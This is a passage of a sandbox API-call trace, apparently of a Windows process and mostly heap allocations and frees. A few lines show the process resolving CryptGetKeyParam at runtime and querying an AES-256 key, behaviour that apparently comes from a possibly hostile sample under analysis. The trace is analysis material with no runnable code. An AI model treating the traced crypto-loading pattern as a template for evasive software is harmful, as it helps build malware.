0x43ca5c8 [0100.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0100.762] PeekMessageW (in: lpMsg=0x144e3e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e3e4) returned 0 [0100.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0100.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0100.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0100.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0100.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0100.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0100.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0100.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0100.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0100.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0100.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0100.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0100.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ec8 [0100.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0100.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0100.762] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0100.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0100.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0100.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0100.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0100.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0100.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0100.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0100.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0100.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0100.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0100.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0100.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0100.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0100.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0100.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0100.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0100.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0100.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0100.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0100.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0100.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0100.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0100.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0100.763] PeekMessageW (in: lpMsg=0x144e3e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e3e4) returned 0 [0100.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0100.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0100.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0100.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0100.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0100.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0100.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0100.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0100.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0100.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0100.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0100.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e70 [0100.763] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0100.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e70 | out: hHeap=0x1780000) returned 1 [0100.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0100.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6a0 [0100.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0100.764] PeekMessageW (in: lpMsg=0x144dd94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144dd94) returned 0 [0100.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0100.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0100.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0100.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0100.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0100.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0100.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0100.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0100.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0100.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0100.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0100.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0100.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0100.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0100.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0100.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0100.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0100.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0100.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0100.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0100.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0100.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0100.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0100.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0100.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0100.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0100.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0100.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0100.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0100.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0100.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0100.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0100.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0100.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0100.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0100.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0100.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0100.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e48 [0100.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b48 [0100.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0100.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0100.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0100.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0100.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0100.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0100.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0100.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0100.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0100.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0100.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0100.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0100.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797108 [0100.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0100.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0100.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0100.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0100.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0100.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0100.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0100.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0100.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0100.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0100.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0100.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0100.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0100.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0100.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0100.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0100.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0100.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0100.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0100.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0100.766] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0100.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0100.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0100.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0100.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0100.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0100.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0100.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0100.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0100.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0100.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0100.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0100.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0100.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0100.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0100.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0100.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0100.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0100.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0100.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0100.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0100.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0100.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0100.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0100.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0100.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0100.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0100.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0100.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0100.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0100.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0100.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0100.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0100.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0100.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0100.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0100.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0100.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0100.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0100.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0100.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0100.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0100.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0100.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0100.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0100.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0100.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0100.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0100.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0100.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0100.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0100.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0100.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0100.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0100.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0100.768] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0100.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0100.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0100.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0100.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0100.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0100.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0100.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0100.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0100.769] CryptGetKeyParam (in: hKey=0x41ac200, dwParam=0x7, pbData=0x43e2890, pdwDataLen=0x144ddb0, dwFlags=0x0 | out: pbData=0x43e2890*=0x6610, pdwDataLen=0x144ddb0*=0x4) returned 1 [0100.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0100.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0100.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0100.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0100.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0100.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0100.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0100.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0100.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0100.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0100.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0100.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0100.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0100.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0100.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0100.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0100.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0100.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0100.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0100.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0100.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0100.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0100.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0100.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0100.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0100.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0100.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0100.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0100.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0100.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0100.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0100.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0100.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0100.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0100.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0100.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0100.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0100.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0100.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0100.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0100.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0100.770] HeapFree 